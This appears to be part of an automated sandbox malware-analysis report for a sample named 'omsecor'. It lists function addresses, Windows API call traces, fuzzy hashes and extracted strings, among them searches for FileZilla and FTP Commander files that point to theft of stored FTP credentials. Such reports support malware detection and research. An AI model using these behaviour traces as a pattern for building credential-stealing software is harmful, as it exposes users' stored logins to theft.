                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                                  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                                  • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040875A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                                                                                                                                                                                                                • String ID: http://$+@
                                                                                                                                                                                                                • API String ID: 147727044-3628382792
                                                                                                                                                                                                                • Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                                                                                                                                                                                                                • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerWrite
                                                                                                                                                                                                                • String ID: UniqueNum$x
                                                                                                                                                                                                                • API String ID: 594998759-2399716736
                                                                                                                                                                                                                • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$*filezilla*
                                                                                                                                                                                                                • API String ID: 3438805939-758400021
                                                                                                                                                                                                                • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$ftp*commander*
                                                                                                                                                                                                                • API String ID: 3438805939-1149875651
                                                                                                                                                                                                                • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                                • API String ID: 3341692771-25359924
                                                                                                                                                                                                                • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "URL"$"encrypted"
                                                                                                                                                                                                                • API String ID: 2525500382-4151690107
                                                                                                                                                                                                                • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "domain"$"url"
                                                                                                                                                                                                                • API String ID: 2525500382-2438671658
                                                                                                                                                                                                                • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                                • API String ID: 71445658-3061378640
                                                                                                                                                                                                                • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3604167287-0
                                                                                                                                                                                                                • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                                                                                                                                                                                                                • CharLowerW.USER32(00408795), ref: 004095D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408795), ref: 00409608
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharFreeLowerString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2335467167-0
                                                                                                                                                                                                                • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID: -
                                                                                                                                                                                                                • API String ID: 885266447-2547889144
                                                                                                                                                                                                                • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                                • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE